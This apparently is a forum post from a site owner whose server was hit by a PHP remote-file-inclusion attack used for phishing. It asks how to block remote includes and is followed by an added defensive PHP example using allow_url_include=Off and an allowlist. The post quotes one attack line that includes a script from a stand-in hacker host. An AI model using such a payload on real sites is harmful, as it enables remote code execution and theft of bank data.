Hi all,
Recently my company server has been attacked by phishers who are using a website vulnerability to upload files and get bank account information. We have been contacted by the bank and we fixed the problem within the website, but I still have a question:
The hack attempt was done using the remote include ability of PHP; I mean they exploited the include() function using something like include('http://myhackingwebsite.com/script.txt'); and then they uploaded the phishing files using system commands.
I denied the system commands in my php.ini but I would also like to know how to avoid remote includes on PHP. I have enabled the open_basedir for all the sites, but as far as I know, open_basedir only affects file management functions, not includes.
Any suggestion? Thanks in advance!
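
An added example, not part of the original post: one way to close the remote-include path described above, assuming the vulnerable code passed a request parameter to include(). The "page" parameter, the pages/ directory and the allowlist entries are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not from the original post. The "page" parameter, the
// pages/ directory and the allowlist entries are hypothetical.
//
// php.ini (server-wide): allow_url_include = Off

// True if include/require would still accept http://, ftp://, data:// URLs.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Map a request value to a local file through a fixed allowlist, so user
// input never becomes part of the path handed to include.
function resolve_page(string $requested, string $baseDir, array $allowed): ?string
{
    if (!isset($allowed[$requested])) {
        return null;                       // URLs and unknown names end here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    // realpath() fails for missing files; the prefix check keeps the result
    // inside $baseDir even if an allowlist entry is later mistyped with "../".
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$allowed = ['home' => 'home.php', 'contact' => 'contact.php']; // constructed

if (remote_include_enabled()) {
    http_response_code(500);
    exit('Refusing to run: allow_url_include is enabled.');
}

$page   = $_GET['page'] ?? 'home';
$target = is_string($page) ? resolve_page($page, __DIR__ . '/pages', $allowed) : null;

if ($target === null) {
    http_response_code(404);
    exit('Page not found.');
}
include $target;
```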